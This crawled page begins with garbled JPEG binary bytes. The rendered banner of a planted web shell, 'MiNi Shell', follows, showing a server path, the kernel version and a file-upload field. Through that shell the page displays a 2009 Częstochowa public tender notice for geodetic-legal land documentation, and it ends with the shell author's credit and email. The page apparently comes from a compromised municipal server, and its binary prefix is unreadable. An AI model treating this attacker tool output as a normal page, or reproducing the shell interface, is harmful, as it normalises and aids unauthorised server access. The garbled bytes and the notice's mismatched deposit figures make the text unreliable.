JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090908/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090908/149999-N-2009.html

<p class="kh_header"><b>Częstochowa: Wykonanie dokumentacji geodezyjno-prawnej dla gruntów Skarbu Państwa oraz jednostek samorządu terytorialnego jednostki ewidencyjnej Częstochowa oraz opis aktualnego stanu prawnego nieruchomości i określenie trybu postępowania przy regulacji stanu prawnego na rzecz Skarbu Państwa</b><br>
<b>Numer ogłoszenia: 149999 - 2009; data zamieszczenia: 08.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Częstochowa , ul. Śląska 11/13, 42-217 Częstochowa, woj. śląskie, tel. (034) 3707100, faks 034 3707175.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.czestochowa.um.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji geodezyjno-prawnej dla gruntów Skarbu Państwa oraz jednostek samorządu terytorialnego jednostki ewidencyjnej Częstochowa oraz opis aktualnego stanu prawnego nieruchomości i określenie trybu postępowania przy regulacji stanu prawnego na rzecz Skarbu Państwa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie dokumentacji geodezyjno-prawnej dla gruntów Skarbu Państwa oraz jednostek samorządu terytorialnego jednostki ewidencyjnej Częstochowa oraz opis aktualnego stanu prawnego nieruchomości i określenie trybu postępowania przy regulacji stanu prawnego na rzecz Skarbu Państwa

Zadanie 1: Regulacja stanów prawnych gruntów Skarbu Państwa dla 15 działek zgodnie z wykazem stanowiącym załącznik nr 1 do specyfikacji. Wykonawca może powierzyć podwykonawcom jedynie wykonanie wszystkich prac polowych związanych z przedmiotem niniejszego zamówienia 

Zadanie 2: Regulacja stanów prawnych gruntów Skarbu Państwa dla 21 działek zgodnie z wykazem stanowiącym załącznik nr 2 do specyfikacji. Wykonawca może powierzyć podwykonawcom jedynie wykonanie wszystkich prac polowych związanych z przedmiotem niniejszego zamówienia 

Zadanie 3: Opis aktualnego stanu prawnego nieruchomości, pozyskanie niezbędnych dokumentów oraz określenie trybu postępowania przy regulacji stanu prawnego dla 21 działek, stanowiących własność lub będących we władaniu Skarbu Państwa, zgodnie z wykazem stanowiącym załącznik nr 3 do specyfikacji.

Zadanie 4: Regulacja stanów prawnych gruntów jednostek samorządu terytorialnego dla 40 działek zgodnie z wykazem stanowiącym załącznik nr 4 do specyfikacji. 
Prace winny być wykonane zgodnie z przepisami Prawa geodezyjnego i kartograficznego oraz instrukcjami i wytycznymi technicznymi..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 01.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga złożenia wadium. 

Wadium ustala się w wysokości: 
Zadanie nr 1 - 445,00 zł (słownie: czterysta czterdzieści dwa złote 00/100).
Zadanie nr 2 - 445,00 zł (słownie: czterysta czterdzieści dwa złote 00/100).
Zadanie nr 3 - 245,00 zł (słownie: dwieście czterdzieści pięć złotych 00/100).
Zadanie nr 4 - 381,00 zł (słownie: trzysta osiemdziesiąt jeden złotych 00/100).

Wadium należy wnieść w terminie do dnia 16.09.2009 r. do  godz. 10:00 .
Wadium może być wnoszone w jednej lub kilku następujących formach: 
a) pieniądzu,
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (j.t. Dz. U. z 2007 r. Nr 42, poz. 275 z późniejszymi zmianami).
Wadium wnoszone w pieniądzu należy wpłacić na rachunek Urzędu Miasta Częstochowy: 
ING Bank Śląski S.A. Oddział w Częstochowie
nr rachunku: 35 1050 1142 1000 0022 8000 2037.

Wadium w innej formie niż pieniądz należy złożyć w formie oryginału w pokoju nr 239 Wydziału Finansowo-Księgowego Urzędu Miasta Częstochowy, ul. Śląska 11/13, a  kserokopię (-e) potwierdzoną ( e) za zgodność z oryginałem przez osobę (-y) uprawnioną (-e) do składania oświadczeń woli w imieniu Wykonawcy dołączyć do oferty.
Wadium wniesione przez jednego ze wspólników konsorcjum uważa się za wniesione prawidłowo. 
UWAGA:
W treści wadium składanego w formie innej niż pieniądz muszą być wyszczególnione okoliczności, w jakich Zamawiający może zatrzymać wadium wraz z odsetkami.
Okoliczności te muszą zawierać sytuacje określone:
1) w art. 46 ust. 4a ustawy Pzp, tj. jeżeli Wykonawca w odpowiedzi na wezwanie, 
o którym mowa w art. 26 ust. 3 ustawy Pzp nie złożył dokumentów lub  oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie
2) w art. 46 ust. 5 ustawy Pzp, tj.: jeżeli Wykonawca, którego oferta została wybrana:
a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunkami udziału w postępowaniu jest: 
Zadanie nr 1, 2, 3, 4 :
a)	dysponowanie co najmniej 1 osobą z uprawnieniami z zakresu 2 (w rozumieniu przepisów ustawy Prawo Geodezyjne i Kartograficzne) lub przedstawienie pisemnego zobowiązania innych podmiotów do udostępnienia tych osób,
b)	dysponowanie co najmniej 3 osobami zdolnymi do wykonania przedmiotu zamówienia lub przedstawienie pisemnego zobowiązania innych podmiotów do udostępnienia tych osób,
c)	nie podleganie wykluczeniu z postępowania o udzielenie zamówienia,
d)	udzielenie 36 miesięcznej gwarancji i rękojmi na wykonaną usługę,

Ww. warunki zostaną uznane za spełnione, jeżeli wykonawca złoży dokumenty, 
o których mowa w punkcie 7 specyfikacji..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oświadczenia i dokumenty, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu:
1. Dokumentami potwierdzającymi spełnianie warunków dla wszystkich zadań są:
a)	Dane osoby, którą dysponuje lub będzie dysponował wykonawca i która będzie uczestniczyć w wykonywaniu zamówienia oraz świadectwo uprawnień zawodowych umożliwiających wykonanie przedmiotu zamówienia; 
b)	Wykaz 3 osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu przedmiotu zamówienia oraz z informacjami na temat ich kwalifikacji zawodowych;
c)	Pisemne zobowiązanie innych podmiotów do udostępnienia osoby zdolnej do wykonania zamówienia, jeżeli w pkt 7.1. a specyfikacji, wykonawca wskazał osobę, którą będzie dysponował;
d)	Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie osób, o którym mowa w pkt 7.1. b specyfikacji, wykonawca wskazał osoby, którymi będzie dysponował;
e)	dowód wpłaty wadium.
2.  Pozostałe dokumenty (dla wszystkich zadań):
a)	wypełniony druk Oferta, stanowiący załącznik nr 8 do specyfikacji,
b)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej,
c)	aktualne zaświadczenie właściwego Naczelnika Urzędu Skarbowego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu  składania ofert,
d)	aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

Wszystkie ww. dokumenty winny być przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę lub osobę (-y) uprawnioną (-e) do składania oświadczeń woli w imieniu Wykonawcy.

Jeżeli upoważnienie do złożenia oferty nie wynika z dokumentów wymienionych w punkcie 7.2. b) specyfikacji, do oferty należy dołączyć stosowne pełnomocnictwo w formie oryginału lub kserokopii potwierdzonej notarialnie.
	Dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę.
W przypadku składania oferty wspólnej przez kilku przedsiębiorców, każdy ze wspólników musi złożyć dokumenty wymienione w punktach 7.2. b), c), d). Pozostałe dokumenty będą traktowane jako wspólne.   
Wspólnicy muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy. Do oferty należy dołączyć stosowne pełnomocnictwo podpisane przez osoby upoważnione do składania oświadczeń woli każdego ze wspólników, w formie oryginału lub kserokopii potwierdzonej notarialnie.
Wspólnicy ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia, określoną w art. 366 Kodeksu cywilnego. 

W przypadku składania oferty przez spółkę cywilną, należy złożyć dokumenty:
1) wymienione w punkcie 7.2.b) specyfikacji dotyczące każdego ze wspólników spółki,
2) wymienione w punkcie 7.2.c) i d) specyfikacji dotyczące zarówno spółki cywilnej, jak i każdego ze wspólników spółki.

Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w punkcie 7.2. b), c) i d) specyfikacji - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1)	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
2)	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
Dokumenty, o których mowa w ppkt. 1) powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w ppkt 2), powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w podpunktach 1) i 2), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://czestochowa.bip-gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Częstochowy
Wydział Geodezji i Kartografii
ul. Waszyngtona 5, 42-217 Częstochowa, pok. 404 a..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.09.2009 godzina 10:00, miejsce: Urząd Miasta Częstochowy
Biuro Obsługi Interesanta (parter), stanowisko nr 1
ul. Śląska 11/13, 42-217 Częstochowa.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Regulacja stanów prawnych gruntów Skarbu Państwa.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1: Regulacja stanów prawnych gruntów Skarbu Państwa dla 15 działek zgodnie z wykazem stanowiącym załącznik nr 1 do specyfikacji. Wykonawca może powierzyć podwykonawcom jedynie wykonanie wszystkich prac polowych związanych z przedmiotem niniejszego zamówienia.

Prace winny być wykonane zgodnie z przepisami Prawa geodezyjnego 
i kartograficznego oraz instrukcjami i wytycznymi technicznymi..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 01.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Regulacja stanów prawnych gruntów Skarbu Państwa.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 2: Regulacja stanów prawnych gruntów Skarbu Państwa dla 21 działek zgodnie z wykazem stanowiącym załącznik nr 2 do specyfikacji. Wykonawca może powierzyć podwykonawcom jedynie wykonanie wszystkich prac polowych związanych z przedmiotem niniejszego zamówienia.

Prace winny być wykonane zgodnie z przepisami Prawa geodezyjnego 
i kartograficznego oraz instrukcjami i wytycznymi technicznymi..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 01.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Opis aktualnego stanu prawnego nieruchomości, pozyskanie niezbędnych dokumentów oraz określenie trybu postępowania przy regulacji stanu prawnego.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 3: Opis aktualnego stanu prawnego nieruchomości, pozyskanie niezbędnych dokumentów oraz określenie trybu postępowania przy regulacji stanu prawnego dla 21 działek, stanowiących własność lub będących we władaniu Skarbu Państwa, zgodnie z wykazem stanowiącym załącznik nr 3 do specyfikacji.

Prace winny być wykonane zgodnie z przepisami Prawa geodezyjnego 
i kartograficznego oraz instrukcjami i wytycznymi technicznymi..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 01.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Regulacja stanów prawnych gruntów jednostek samorządu terytorialnego.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 4: Regulacja stanów prawnych gruntów jednostek samorządu terytorialnego dla 40 działek zgodnie z wykazem stanowiącym załącznik nr 4 do niniejszej specyfikacji. 

Prace winny być wykonane zgodnie z przepisami Prawa geodezyjnego 
i kartograficznego oraz instrukcjami i wytycznymi technicznymi..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 01.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com